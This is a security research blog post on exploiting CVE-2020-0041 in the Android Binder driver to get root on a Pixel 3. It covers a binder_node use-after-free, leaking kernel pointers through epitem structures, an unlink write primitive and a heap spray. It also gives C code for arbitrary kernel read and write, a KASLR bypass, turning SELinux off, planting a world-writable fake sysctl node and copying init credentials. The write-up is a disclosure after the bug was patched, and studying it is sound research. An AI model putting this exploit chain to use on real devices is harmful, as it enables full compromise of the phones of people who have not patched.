Exploiting CVE-2020-0041 - Part 2: Escalating to root

Exploiting the kernel with CVE-2020-0041 to achieve root privileges

Posted on Apr 08, 2020

A few months ago we discovered and exploited a bug in the Binder driver, which we reported to Google on December 10, 2019. The bug was included in the March 2020 Android Security Bulletin, with CVE-2020-0041.

In the previous post we described the bug and how to use it to escape the Google Chrome sandbox. If you haven't read that post, please do so now in order to understand what bug we are exploiting and what primitives we have available. In this post we'll describe how to attack the kernel and obtain root privileges on a Pixel 3 device using the same bug.

Reminder: memory corruption primitives

As described in our previous post, we can corrupt parts of a validated binder transaction while it's being processed by the driver. There are two stages at which these values are used that we could target for our attack:

When the transaction is received, it gets processed by the userspace components. This includes libbinder (or libhwbinder if using /dev/hwbinder) as well as upper layers. This is what we used to attack the Chrome browser process in the previous post.
When userspace is done with the transaction buffer, it asks the driver to free it with the BC_FREE_BUFFER command. This results in the driver processing the transaction buffer.

Let's analyze the transaction buffer cleanup code in the binder driver while considering that we could have corrupted the transaction data:

 

static void binder_transaction_buffer_release(struct binder_proc *proc,
                          struct binder_buffer *buffer,
                          binder_size_t failed_at,
                          bool is_failure)
{
    int debug_id = buffer->debug_id;
    binder_size_t off_start_offset, buffer_offset, off_end_offset;

    binder_debug(BINDER_DEBUG_TRANSACTION,
             "%d buffer release %d, size %zd-%zd, failed at %llx\n",
             proc->pid, buffer->debug_id,
             buffer->data_size, buffer->offsets_size,
             (unsigned long long)failed_at);

    if (buffer->target_node)
[1]     binder_dec_node(buffer->target_node, 1, 0);

    off_start_offset = ALIGN(buffer->data_size, sizeof(void *));
    off_end_offset = is_failure ? failed_at :
                off_start_offset + buffer->offsets_size;
[2]    for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
         buffer_offset += sizeof(binder_size_t)) {
        struct binder_object_header *hdr;
        size_t object_size;
        struct binder_object object;
        binder_size_t object_offset;

        binder_alloc_copy_from_buffer(&proc->alloc, &object_offset,
                          buffer, buffer_offset,
                          sizeof(object_offset));
        object_size = binder_get_object(proc, buffer,
                        object_offset, &object);
        if (object_size == 0) {
            pr_err("transaction release %d bad object at offset %lld, size %zd\n",
                   debug_id, (u64)object_offset, buffer->data_size);
            continue;
        }
        hdr = &object.hdr;
        switch (hdr->type) {
        case BINDER_TYPE_BINDER:
        case BINDER_TYPE_WEAK_BINDER: {
            struct flat_binder_object *fp;
            struct binder_node *node;

            fp = to_flat_binder_object(hdr);
[3]         node = binder_get_node(proc, fp->binder);
            if (node == NULL) {
                pr_err("transaction release %d bad node %016llx\n",
                       debug_id, (u64)fp->binder);
                break;
            }
            binder_debug(BINDER_DEBUG_TRANSACTION,
                     "        node %d u%016llx\n",
                     node->debug_id, (u64)node->ptr);
[4]         binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER,
                    0);
            binder_put_node(node);
        } break;

...

        case BINDER_TYPE_FDA: {
...
            /*
             * the source data for binder_buffer_object is visible
             * to user-space and the @buffer element is the user
             * pointer to the buffer_object containing the fd_array.
             * Convert the address to an offset relative to
             * the base of the transaction buffer.
             */
[5]         fda_offset =
                (parent->buffer - (uintptr_t)buffer->user_data) +
                fda->parent_offset;
            for (fd_index = 0; fd_index < fda->num_fds;
                 fd_index++) {
                u32 fd;
                binder_size_t offset = fda_offset +
                    fd_index * sizeof(fd);

                binder_alloc_copy_from_buffer(&proc->alloc,
                                  &fd,
                                  buffer,
                                  offset,
                                  sizeof(fd));
[6]             task_close_fd(proc, fd);
            }
        } break;
        default:
            pr_err("transaction release %d bad object type %x\n",
                debug_id, hdr->type);
            break;
        }
    }
}

At [1] the driver checks if there is a target binder node for the current transaction, and if it exists it decrements its reference count. This is interesting because it could trigger the release of such a node if its reference count reaches zero, but we do not have control of this pointer.

At [2] the driver iterates through all objects in the transaction, and goes into a switch statement where the required cleanup is performed for each object type. For types BINDER_TYPE_BINDER and BINDER_TYPE_WEAK_BINDER, the cleanup involves looking up an object using fp->binder at [3] and then decrementing the reference count at [4]. Since fp->binder is read from the transaction buffer, we can actually prematurely release node references by replacing this value with a different one. This can in turn lead to use-after-free of binder_node objects.

Finally, for BINDER_TYPE_FDA objects we could corrupt the parent->buffer field used at [5] and end up closing arbitrary file descriptors on a remote process.

In our exploit we targeted the reference counts of BINDER_TYPE_BINDER objects to cause a use-after-free on objects of type struct binder_node. This is exactly the same type of use-after-free we described in our OffensiveCon presentation about CVE-2019-2205. However some of the techniques we used in that exploit are not available to us in recent kernels anymore.

Aside: using binder to talk to yourself

The binder driver is designed in such a way that transactions can only be sent to handles you have received from other processes or to the context manager (handle 0). In general, when one wants to talk to a service, they first request a handle to the context manager (servicemanager, hwservicemanager or vndservicemanager for the three Binder domains used in current versions of Android).

If a service creates a sub-service or an object on behalf of the client, then the service will send a handle such that the client can talk to the new object.

In some situations, it would be beneficial to control both ends of the communication, e.g. to have better timing control for race conditions. In our particular case, we require knowing the address of the receiving-side binder mapping while we are sending the transaction to avoid a crash. Additionally, in order to cause a use-after-free with the corruption primitive we have, the receiving process has to create binder nodes with the fp->binder field equal to the sg_buf value we are corrupting with (which belongs to the sender address space).

The easiest way to meet all these constraints is to control both the sending and the receiving end of a transaction. In that case, we have access to all the required values and do not need to use an info-leak to retrieve them from a remote process.

However, we are not allowed to register services through the context manager from unprivileged applications, so we cannot go the normal route. Instead, we used the ITokenManager service in the /dev/hwbinder domain to setup the communication channel. To our knowledge, this service was first publicly used by Gal Beniamini in this Project Zero report:

Note that in order to pass the binder instance between process A and process B, the "Token 
Manager" service can be used. This service allows callers to insert binder objects and retrieve
20-byte opaque tokens representing them. Subsequently, callers can supply the same 20-byte
token, and retrieve the previously inserted binder object from the service. The service is 
accessible even to (non-isolated) app contexts (http://androidxref.com/8.0.0_r4/xref/system/sepolicy/private/app.te#188).

We use this very same mechanism in our exploit in order to have a handle to our own "process". Note however that "process" here does not really mean an actual process, but a binder_proc structure associated to a binder file descriptor.

This means we can open two binder file descriptors, create a token through the first file descriptor and retrieve it from the second one. With this, we have received a handle owned by the first file descriptor, and can now send binder transactions between the two.

Leaking data with the binder_node use-after-free

Binder nodes are used by the driver in two different ways: as part of transaction contents in order to pass them from one process to another, or as targets of a transaction. When used as part of a transaction, these nodes are always retrieved from a rb-tree of nodes and properly reference counted. When we cause a use-after-free of a node, it also gets removed from the rb-tree. For this reason, we can only have dangling pointers to freed nodes when used as targets of a transaction, since in this case pointers to the actual binder_node are stored by the driver in transaction->target_node.

There are quite a few references to target_node in the binder driver, but many of them are performed in the sending path of a transaction or in debug code. From the others, the transaction receipt path provides us a way to leak some data back to userland:

        struct binder_transaction_data *trd = &tr.transaction_data;

...

        if (t->buffer->target_node) {
            struct binder_node *target_node = t->buffer->target_node;
            struct binder_priority node_prio;

[1]         trd->target.ptr = target_node->ptr;
            trd->cookie =  target_node->cookie;
            node_prio.sched_policy = target_node->sched_policy;
            node_prio.prio = target_node->min_priority;
            binder_transaction_priority(current, t, node_prio,
                            target_node->inherit_rt);
            cmd = BR_TRANSACTION;
        } else {
            trd->target.ptr = 0;
            trd->cookie = 0;
            cmd = BR_REPLY;
        }

...

[2]     if (copy_to_user(ptr, &tr, trsize)) {
            if (t_from)
                binder_thread_dec_tmpref(t_from);

            binder_cleanup_transaction(t, "copy_to_user failed",
                           BR_FAILED_REPLY);

            return -EFAULT;
        }
        ptr += trsize;

At [1] the driver extracts two 64-bit values from the target_node into the transaction_data structure. This structure is later copied to userland at [2]. Therefore, if we receive a transaction after we have freed its target_node and replaced it by another object, we can read out two 64-bit fields at the offsets corresponding to ptr and cookie.

If we look at this structure on gdb for a build of a recent pixel 3 kernel, we can see these fields at offsets 0x58 and 0x60 respectively:

(gdb) pt /o struct binder_node
/* offset    |  size */  type = struct binder_node {
/*    0      |     4 */    int debug_id;
/*    4      |     4 */    spinlock_t lock;
/*    8      |    24 */    struct binder_work {
/*    8      |    16 */        struct list_head {
/*    8      |     8 */            struct list_head *next;
/*   16      |     8 */            struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } entry;
/*   24      |     4 */        enum {BINDER_WORK_TRANSACTION = 1, BINDER_WORK_TRANSACTION_COMPLETE, BINDER_WORK_RETURN_ERROR, BINDER_WORK_NODE, BINDER_WORK_DEAD_BINDER, BINDER_WORK_DEAD_BINDER_AND_CLEAR, BINDER_WORK_CLEAR_DEATH_NOTIFICATION} type;

                               /* total size (bytes):   24 */
                           } work;
/*   32      |    24 */    union {
/*                24 */        struct rb_node {
/*   32      |     8 */            unsigned long __rb_parent_color;
/*   40      |     8 */            struct rb_node *rb_right;
/*   48      |     8 */            struct rb_node *rb_left;

                                   /* total size (bytes):   24 */
                               } rb_node;
/*                16 */        struct hlist_node {
/*   32      |     8 */            struct hlist_node *next;
/*   40      |     8 */            struct hlist_node **pprev;

                                   /* total size (bytes):   16 */
                               } dead_node;

                               /* total size (bytes):   24 */
                           };
/*   56      |     8 */    struct binder_proc *proc;
/*   64      |     8 */    struct hlist_head {
/*   64      |     8 */        struct hlist_node *first;

                               /* total size (bytes):    8 */
                           } refs;
/*   72      |     4 */    int internal_strong_refs;
/*   76      |     4 */    int local_weak_refs;
/*   80      |     4 */    int local_strong_refs;
/*   84      |     4 */    int tmp_refs;
/*   88      |     8 */    binder_uintptr_t ptr;
/*   96      |     8 */    binder_uintptr_t cookie;
/*  104      |     1 */    struct {
/*  104: 7   |     1 */        u8 has_strong_ref : 1;
/*  104: 6   |     1 */        u8 pending_strong_ref : 1;
/*  104: 5   |     1 */        u8 has_weak_ref : 1;
/*  104: 4   |     1 */        u8 pending_weak_ref : 1;

                               /* total size (bytes):    1 */
                           };
/*  105      |     2 */    struct {
/*  105: 6   |     1 */        u8 sched_policy : 2;
/*  105: 5   |     1 */        u8 inherit_rt : 1;
/*  105: 4   |     1 */        u8 accept_fds : 1;
/*  105: 3   |     1 */        u8 txn_security_ctx : 1;
/* XXX  3-bit hole   */
/*  106      |     1 */        u8 min_priority;

                               /* total size (bytes):    2 */
                           };
/*  107      |     1 */    bool has_async_transaction;
/* XXX  4-byte hole  */
/*  112      |    16 */    struct list_head {
/*  112      |     8 */        struct list_head *next;
/*  120      |     8 */        struct list_head *prev;

                               /* total size (bytes):   16 */
                           } async_todo;

                           /* total size (bytes):  128 */
                         }

Therefore, we need to find objects that we can allocate and free at will, and that contain interesting data at these offsets. When we originally reported this bug to Google we produced a minimal exploit that overwrote selinux_enforcing, and we used a kgsl_drawobj_sync which would leak a pointer to itself and a pointer to a kernel function. This was enough for that minimal proof of concept, but not for a full root exploit as we are describing here.

For the full exploit, we used the same object as in our CVE-2019-2025 exploit: the epitem structure used to track watched files within eventpoll:

    (gdb) pt /o struct epitem
    /* offset    |  size */  type = struct epitem {
    /*    0      |    24 */    union {
    /*                24 */        struct rb_node {
    /*    0      |     8 */            unsigned long __rb_parent_color;
    /*    8      |     8 */            struct rb_node *rb_right;
    /*   16      |     8 */            struct rb_node *rb_left;

                                       /* total size (bytes):   24 */
                                   } rbn;
    /*                16 */        struct callback_head {
    /*    0      |     8 */            struct callback_head *next;
    /*    8      |     8 */            void (*func)(struct callback_head *);

                                       /* total size (bytes):   16 */
                                   } rcu;

                                   /* total size (bytes):   24 */
                               };
    /*   24      |    16 */    struct list_head {
    /*   24      |     8 */        struct list_head *next;
    /*   32      |     8 */        struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } rdllink;
    /*   40      |     8 */    struct epitem *next;
    /*   48      |    12 */    struct epoll_filefd {
    /*   48      |     8 */        struct file *file;
    /*   56      |     4 */        int fd;

                                   /* total size (bytes):   12 */
                               } ffd;
    /*   60      |     4 */    int nwait;
    /*   64      |    16 */    struct list_head {
    /*   64      |     8 */        struct list_head *next;
    /*   72      |     8 */        struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } pwqlist;
    /*   80      |     8 */    struct eventpoll *ep;

    /*   88      |    16 */    struct list_head {
    /*   88      |     8 */        struct list_head *next;
    /*   96      |     8 */        struct list_head *prev;
    
                                   /* total size (bytes):   16 */
                               } fllink;

    /*  104      |     8 */    struct wakeup_source *ws;
    /*  112      |    16 */    struct epoll_event {
    /*  112      |     4 */        __u32 events;
    /* XXX  4-byte hole  */
    /*  120      |     8 */        __u64 data;

                                   /* total size (bytes):   16 */
                               } event;

                               /* total size (bytes):  128 */
                             }

As can be seen above, the fllink linked list overlaps with the leaked fields. This list is used by eventpoll to link all epitem structures that are watching the same struct file. Thus, we can leak a pair of kernel pointers.

There are several possibilities here, but let's consider how the data structures look like if we have only one such epitem structure for a particular struct file:

Therefore, should we leak the fllink contents for the epitem in the picture above, we would learn two identical pointers into the file structure. Now consider what happens if we have a second epitem on the same file:

In this case, if we leak from both epitem at the same time, we'd be learning their addresses as well as the address of the corresponding struct file.

In our exploit we use both these tricks to disclose a struct file pointer and the address of the freed nodes before using them for the write primitive.

Note however that in order to leak data, we need to leave a pending transaction queued until we can trigger the bug and free the binder_node. The exploit does this by having dedicated threads for each pending transaction, and then decrementing the reference count as many times as required to free the node. After this happens, we can leak from the freed buffer at any time we like, as many times as pending transactions we have created.

Memory write primitive

In order to identify a memory write primitive, we turn to another use of the transaction->target_node field: the decrement of the reference count in binder_transaction_buffer_release discussed earlier. Assume we have replaced the freed node with a fully controlled object. In this case, the driver decrements the reference count of the node with the following code:

static bool binder_dec_node_nilocked(struct binder_node *node,
                     int strong, int internal)
{
    struct binder_proc *proc = node->proc;

    assert_spin_locked(&node->lock);
    if (proc)
        assert_spin_locked(&proc->inner_lock);
    if (strong) {
        if (internal)
            node->internal_strong_refs--;
        else
            node->local_strong_refs--;
        if (node->local_strong_refs || node->internal_strong_refs)
            return false;
    } else {
        if (!internal)
            node->local_weak_refs--;
        if (node->local_weak_refs || node->tmp_refs ||
                !hlist_empty(&node->refs))
            return false;
    }

    if (proc && (node->has_strong_ref || node->has_weak_ref)) {
        if (list_empty(&node->work.entry)) {
            binder_enqueue_work_ilocked(&node->work, &proc->todo);
            binder_wakeup_proc_ilocked(proc);
        }
[1] } else {
        if (hlist_empty(&node->refs) && !node->local_strong_refs &&
            !node->local_weak_refs && !node->tmp_refs) {
            if (proc) {
                binder_dequeue_work_ilocked(&node->work);
                rb_erase(&node->rb_node, &proc->nodes);
                binder_debug(BINDER_DEBUG_INTERNAL_REFS,
                         "refless node %d deleted\n",
                         node->debug_id);
            } else {
[2]             BUG_ON(!list_empty(&node->work.entry));
                spin_lock(&binder_dead_nodes_lock);
                /*
                 * tmp_refs could have changed so
                 * check it again
                 */
                if (node->tmp_refs) {
                    spin_unlock(&binder_dead_nodes_lock);
                    return false;
                }
[3]             hlist_del(&node->dead_node);
                spin_unlock(&binder_dead_nodes_lock);
                binder_debug(BINDER_DEBUG_INTERNAL_REFS,
                         "dead node %d deleted\n",
                         node->debug_id);
            }
            return true;
        }
    }
    return false;
}

We can setup the node data such that we reach the else branch at [1] and ensure that node->proc is NULL. In that case we first reach the list_empty check at [2]. To bypass this check we need to setup an empty list (i.e. next and prev point to the list_head itself), which is why we require to leak the node address first.

Once we've bypassed the check at [2], we can reach the hlist_del at [3] with controlled data. The function performs the following operations:

static inline void __hlist_del(struct hlist_node *n)
{
    struct hlist_node *next = n->next;
    struct hlist_node **pprev = n->pprev;

    WRITE_ONCE(*pprev, next);
    if (next)
        next->pprev = pprev;
}

static inline void hlist_del(struct hlist_node *n)
{
    __hlist_del(n);
    n->next = LIST_POISON1;
    n->pprev = LIST_POISON2;
}

This boils down to the classic unlink primitive where we can set *X = Y and *(Y+8) = X. Therefore, having two writable kernel addresses we can corrupt some of their data using this. Additionally, if we set next = NULL we can perform a single 8-byte NULL write by having just one kernel address.

Reallocating freed nodes with arbitrary contents

The steps for obtaining an unlink primitive leading to memory corrupion described above assume we can replace the freed object by a controlled object. We do not need full control of the object, but just enough to pass all the checks and trigger the hlist_del primitive without crashing.

In order to achieve that, we used a well known technique: spraying with control messages through the sendmsg syscall. The code for this system call looks as follows:

static int ___sys_sendmsg(struct socket *sock, struct user_msghdr __user *msg,
             struct msghdr *msg_sys, unsigned int flags,
             struct used_address *used_address,
             unsigned int allowed_msghdr_flags)
{
    struct compat_msghdr __user *msg_compat =
        (struct compat_msghdr __user *)msg;
    struct sockaddr_storage address;
    struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
    unsigned char ctl[sizeof(struct cmsghdr) + 20]
        __attribute__ ((aligned(sizeof(__kernel_size_t))));
    /* 20 is size of ipv6_pktinfo */
    unsigned char *ctl_buf = ctl;
    int ctl_len;
    ssize_t err;

...

        if (ctl_len > sizeof(ctl)) {
[1]         ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
            if (ctl_buf == NULL)
                goto out_freeiov;
        }
        err = -EFAULT;
        /*
         * Careful! Before this, msg_sys->msg_control contains a user pointer.
         * Afterwards, it will be a kernel pointer. Thus the compiler-assisted
         * checking falls down on this.
         */
[2]     if (copy_from_user(ctl_buf,
                   (void __user __force *)msg_sys->msg_control,
                   ctl_len))
            goto out_freectl;
        msg_sys->msg_control = ctl_buf;
    }

...


out_freectl:
    if (ctl_buf != ctl)
[3]    sock_kfree_s(sock->sk, ctl_buf, ctl_len);
out_freeiov:
    kfree(iov);
    return err;
}

At [1] a buffer is allocated on the kernel heap if the requested control message length is larger than the local ctl buffer. At [2] the control message is copied in from userland, and finally after the message is processed the allocated buffer is freed at [3].

We use a blocking call to make the system call block once the destination socket buffer is full, therefore blocking after the thread between points [2] and [3]. In this way we can control the lifetime of the replacement object.

We could also make use of the approach used by Jann Horn in his PROCA exploit: let the sendmsg call complete, and immediately reallocate the object with e.g. a signalfd file descriptor. This would have the advantage of not needing a separate thread for each allocation, but otherwise the results should be fairly similar.

In any case, using this type of spraying we can reallocate the freed binder_node with almost complete control, as we require in order to trigger the write primitives described earlier.

One thing to note though is that if our spray fails, we'll end up crashing the kernel because of the amount of operations and checks being performed on the freed memory. However, this use-after-free has the very nice property that as long as we do not trigger the write primitive, we can simply close the binder file descriptor and the kernel won't notice any effects.

Thus, before we try to trigger a write primitive, we use the leak primitive to verify that we have successfully reallocated the node. We can do this by simply having a large amount of pending transactions, and reading one each time we need to leak some data off the freed object. If the data is not what we expected, we can simply close the binder file descriptor and try again.

This property makes the exploit quite reliable even in the presence of relatively unreliable reallocations.

Obtaining an arbitrary read primitive

At this point, we use the same arbitrary read technique as described in the OffensiveCon 2020 talk. That is, we corrupt file->f_inode and use the following code to perform reads:

int do_vfs_ioctl(struct file *filp, unsigned int fd, unsigned int cmd,
         unsigned long arg)
{
    int error = 0;
    int __user *argp = (int __user *)arg;
    struct inode *inode = file_inode(filp);

    switch (cmd) {

...

    case FIGETBSZ:
        return put_user(inode->i_sb->s_blocksize, argp);

...

If you looked at our slides, back in late 2018 we used a binder mapping spray to bypass PAN and have controlled data at a controlled location. However, the bug we are exploiting here was introduced while getting rid of the long-term kernel-side binder mappings. This means we cannot use binder mapping sprays anymore, and we must find another solution.

The solution we came up with was pointing our f_inode field right into an epitem structure. This structure contains a completely controllable 64-bit field: the event.data field. We can modify this field by using ep_ctl(efd, EPOLL_CTL_MOD, fd, &event). Thus, if we line up the data field with the inode->i_sb field we'll be able to perform an arbitrary read.

The following picture shows the setup graphically:

Note how we have also corrupted the fllink.next field of the epitem, which now points back into the file->f_inode field due to our write primitive. This could be a problem if this field is ever used, but because we are the only users of these struct file and epitem instances, we just need to avoid calling any API that makes use of them and we'll be fine.

Based on the setup depicted above, we can now construct an arbitrary read primitive as follows:

uint64_t read32(uint64_t addr) {
   struct epoll_event evt;
   evt.events = 0;
   evt.data.u64 = addr - 24;
   int err = epoll_ctl(file->ep_fd, EPOLL_CTL_MOD, pipes[0], &evt);
   uint32_t test = 0xdeadbeef;
   ioctl(pipes[0], FIGETBSZ, &test);
   return test;
}

uint64_t read64(uint64_t addr) {
   uint32_t lo = read32(addr);
   uint32_t hi = read32(addr+4);

   return (((uint64_t)hi) << 32) | lo;
}

Note that we set the data field of the epitem to addr - 24, where 24 is the offset of s_blocksize within the superblock structure. Also, even though s_blocksize is in principle 64-bit long, the ioctl code only copies 32-bits back to userland so we need to read twice if we want to read 64 bit values.

Now that we have an arbitrary read and we know the address of a struct file from our initial leak, we can simply read its f_op field to retrieve a kernel .text pointer. This then leads to fully bypassing KASLR:

   /* Step 1: leak a pipe file address */

   file = node_new("leak_file");

   /* Only works on file implementing the 'epoll' function. */
   while (!node_realloc_epitem(file, pipes[0]))
      node_reset(file);

   uint64_t file_addr = file->file_addr;
   log_info("[+] pipe file: 0x%lx\n", file_addr);


   /* Step 2: leak epitem address */
   struct exp_node *epitem_node = node_new("epitem");
   while (!node_kaddr_disclose(file, epitem_node))
      node_reset(epitem_node);

   printf("[*] file epitem at %lx\n", file->kaddr);

   /* 
    * Alright, now we want to do a write8 to set file->f_inode.
    * Given the unlink primitive, we'll set file->f_inode = epitem + 80
    * and epitem + 88 = &file->f_inode.
    * 
    * With this we can change f_inode->i_sb by modifying the epitem data, 
    * and get an arbitrary read through ioctl.
    *
    * This is corrupting the fllink, so we better don't touch anything there!
    */

   struct exp_node *write8_inode = node_new("write8_inode");
   node_write8(write8_inode, file->kaddr + 120 - 40 , file_addr + 0x20);

   printf("[*] Write done, should have arbitrary read now.\n");
   uint64_t fop = read64(file_addr + 0x28);
   printf("[+] file operations: %lx\n", fop);

   kernel_base = fop - OFFSET_PIPE_FOP;
   printf("[+] kernel base: %lx\n", kernel_base);

Disabling SELinux and setting up an arbitrary write primitive

Now that we know the kernel base address, we can use our write primitive to write a NULL qword over the selinux_enforcing variable and set SELinux to permissive mode. Our exploit does this before setting up an arbitrary write primitive, because the technique we came up with actually requires disabling SELinux.

After considering a few alternatives, we ended up settling for attacking the sysctl tables the kernel uses to handle /proc/sys and all the data hanging from there. There are a number of global tables describing these variables, such as kern_table below:

static struct ctl_table kern_table[] = {
    {
        .procname   = "sched_child_runs_first",
        .data       = &sysctl_sched_child_runs_first,
        .maxlen     = sizeof(unsigned int),
        .mode       = 0644,
        .proc_handler   = proc_dointvec,
    },
#if defined(CONFIG_PREEMPT_TRACER) || defined(CONFIG_IRQSOFF_TRACER)
    {
        .procname       = "preemptoff_tracing_threshold_ns",
        .data           = &sysctl_preemptoff_tracing_threshold_ns,
        .maxlen         = sizeof(unsigned int),
        .mode           = 0644,
        .proc_handler   = proc_dointvec,
    },
    {
        .procname       = "irqsoff_tracing_threshold_ns",
        .data           = &sysctl_irqsoff_tracing_threshold_ns,
        .maxlen         = sizeof(unsigned int),
        .mode           = 0644,
        .proc_handler   = proc_dointvec,
    },

...

For example, the first variable is called "sched_child_runs_first", which means it can be accessed through /proc/sys/kernel/sched_child_runs_first. The file mode is 0644, so it's writable for root only (of course SELinux restrictions may apply) and it's an integer. The reading and writing is handled by the proc_dointvec function, which will convert the integer to and from string representation when the file is accessed. The data field points to where the variable is found in memory, which makes it an interesting target to obtain an arbitrary read/write primitive.

We initially tried to target some of these variables, but then realized that this table is actually only used during kernel initialization. This means that corrupting the contents of this table is not very useful to us. However, this table is used to create a set of in-memory structures that define the existing sysctl variables and their permissions.

These structures can be found by analyzing the sysctl_table_root structure, which contains an rb-tree of ctl_node nodes, which then point to ctl_table tables defining the variables themselves. Since we have a read primitive, we can parse the tree and find the left-most node within it, which has no children nodes.

Under normal circumstances, this tree looks as shown in the picture below (only representing left-child connections to keep the diagram somewhat readable):

If you look at the alphabetic order of these nodes, you can see that all left-child nodes are sorted in descending alphabetic order. In fact, this is the balancing rule in these trees: left-children have to be lower than the current node, and right-children higher.

Thus, to ensure we keep the tree balanced, we add a left child to the left-most node with a name starting with "aaa" using our write8 primitive. The following code finds the left-most node of the tree in prev_node, which will be the insertion point for our fake node:

   /* Now we can prepare our magic sysctl node as s child of the left-most node */

   uint64_t sysctl_table_root = kernel_base + SYSCTL_TABLE_ROOT_OFFSET;
   printf("[+] sysctl_table_root = %lx\n", sysctl_table_root);
   uint64_t ctl_dir = sysctl_table_root + 8;

   uint64_t node = read64(ctl_dir + 80);
   uint64_t prev_node;
   while (node != 0) {
      prev_node = node;
      node = read64(node + 0x10); 
   }

In order to insert the new node, we need to find a location within kernel memory for it. This is required because modern phones come with PAN (Privileged Access Never) enabled, which prevents the kernel from inadvertently using userland memory. Given that we have an arbitrary read primitive, we sort this out by parsing our process' page tables starting at current->mm->pgd and locating the address of one of our pages in the physmap. Additionally, using the physmap alias of our own userspace page is ideal because we can easily edit the nodes to change the address of the data we want to target, giving us a flexible read/write primitive.

We resolve the physmap alias in the following way:

   /* Now resolve our mapping at 2MB. But first read memstart_addr so we can do phys_to_virt() */

   memstart_addr = read64(kernel_base + MEMSTART_ADDR_OFFSET);
   printf("[+] memstart_addr: 0x%lx\n", memstart_addr);
   uint64_t mm = read64(current + MM_OFFSET);
   uint64_t pgd = read64(mm + 0x40);
   uint64_t entry = read64(pgd);

   uint64_t next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12);
   printf("[+] First level entry: %lx -> next table at %lx\n", entry, next_tbl);

   /* Offset 8 for 2MB boundary */
   entry = read64(next_tbl + 8);
   next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12);
   printf("[+] Second level entry: %lx -> next table at %lx\n", entry, next_tbl);

   entry = read64(next_tbl);
   uint64_t kaddr = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12);


   *(uint64_t *)map = 0xdeadbeefbadc0ded;
   if ( read64(kaddr) != 0xdeadbeefbadc0ded) {
      printf("[!] Something went wrong resolving the address of our mapping\n");
      goto out;
   }

Note we required to read the contents of memstart_addr in order to be able to translate between physical addresses and the corresponding physmap address. In any case, after running this code we know that the data we find at 0x200000 in our process address space can also be found at kaddr in kernel land.

With this, we setup a new sysctl node as follows:

   /* We found the insertion place, setup the node */

   uint64_t node_kaddr = kaddr;
   void *node_uaddr = map;

   uint64_t tbl_header_kaddr = kaddr + 0x80;
   void *tbl_header_uaddr = map + 0x80;

   uint64_t ctl_table_kaddr = kaddr + 0x100;
   ctl_table_uaddr = map + 0x100;

   uint64_t procname_kaddr = kaddr + 0x200;
   void * procname_uaddr = map + 0x200;

   /* Setup rb_node */
   *(uint64_t *)(node_uaddr + 0x00) = prev_node;              // parent = prev_node
   *(uint64_t *)(node_uaddr + 0x08) = 0;                      // right = null
   *(uint64_t *)(node_uaddr + 0x10) = 0;                      // left = null

   *(uint64_t *)(node_uaddr + 0x18) = tbl_header_kaddr;       // my_tbl_header

   *(uint64_t *)(tbl_header_uaddr) = ctl_table_kaddr;
   *(uint64_t *)(tbl_header_uaddr + 0x18) = 0;                // unregistering
   *(uint64_t *)(tbl_header_uaddr + 0x20) = 0;                // ctl_Table_arg
   *(uint64_t *)(tbl_header_uaddr + 0x28) = sysctl_table_root;      // root
   *(uint64_t *)(tbl_header_uaddr + 0x30) = sysctl_table_root;      // set
   *(uint64_t *)(tbl_header_uaddr + 0x38) = sysctl_table_root + 8;  // parent
   *(uint64_t *)(tbl_header_uaddr + 0x40) = node_kaddr;          // node
   *(uint64_t *)(tbl_header_uaddr + 0x48) = 0;                // inodes.first

   /* Now setup ctl_table */
   uint64_t proc_douintvec = kernel_base + PROC_DOUINTVEC_OFFSET;
   *(uint64_t *)(ctl_table_uaddr) = procname_kaddr;           // procname
   *(uint64_t *)(ctl_table_uaddr + 8) = kernel_base;          // data == what to read/write
   *(uint32_t *)(ctl_table_uaddr + 16) = 0x8;                 // max size
   *(uint64_t *)(ctl_table_uaddr + 0x20) = proc_douintvec;       // proc_handler
   *(uint32_t *)(ctl_table_uaddr + 20) = 0666;             // mode = rw-rw-rw-

   /*
    * Compute and write the node name. We use a random name starting with aaa
    * for two reasons:
    *
    *  - Must be the first node in the tree alphabetically given where we insert it (hence aaa...)
    *
    *  - If we already run, there's a cached dentry for each name we used earlier which has dangling 
    *    pointers but is only reachable through path lookup. If we'd reuse the name, we'd crash using 
    *    this dangling pointer at open time.
    *
    * It's easier to have a unique enough name instead of figuring out how to clear the cache,
    * which would be the cleaner solution here.
    */

   int fd = open("/dev/urandom", O_RDONLY);
   uint32_t rnd;
   read(fd, &rnd, sizeof(rnd));

   sprintf(procname_uaddr, "aaa_%x", rnd);
   sprintf(pathname, "/proc/sys/%s", procname_uaddr);

   /* And finally use a write8 to inject this new sysctl node */
   struct exp_node *write8_sysctl = node_new("write8_sysctl");
   node_write8(write8_sysctl, kaddr, prev_node + 16);

This basically creates one file at /proc/sys/aaa_[random], with read/write permissions, and uses proc_douintvec to handle read/writes. This function will take the data field as the pointer to read from or write to, and allow up to max_size bytes to be read or written as unsigned integers.

With this, we can setup a write primitive as follows:

void write64(uint64_t addr, uint64_t value) {
   *(uint64_t *)(ctl_table_uaddr + 8) = addr;          // data == what to read/write
   *(uint32_t *)(ctl_table_uaddr + 16) = 0x8;

   char buf[100];
   int fd = open(pathname, O_WRONLY);
   if (fd < 0) {
      printf("[!] Failed to open. Errno: %d\n", errno);
   }

   sprintf(buf, "%u %u\n", (uint32_t)value, (uint32_t)(value >> 32));
   int ret = write(fd, buf, strlen(buf));
   if (ret < 0)
      printf("[!] Failed to write, errno: %d\n", errno);
   close(fd); 
}

void write32(uint64_t addr, uint32_t value) {
   *(uint64_t *)(ctl_table_uaddr + 8) = addr;          // data == what to read/write
   *(uint32_t *)(ctl_table_uaddr + 16) = 4;

   char buf[100];
   int fd = open(pathname, O_WRONLY);
   sprintf(buf, "%u\n", value);
   write(fd, buf, strlen(buf));
   close(fd);
}

Getting root and cleaning up

Once we have read/write capabilities on a Pixel phone, obtaining root access is as simple as copying the credentials from a root task. Since we have already disabled SELinux earlier, we just need to find the init credentials, bump their reference count and copy them to our process like this:

   /* Set refcount to 0x100 and set our own credentials to init's */
   write32(init_cred, 0x100);
   write64(current + REAL_CRED_OFFSET, init_cred);
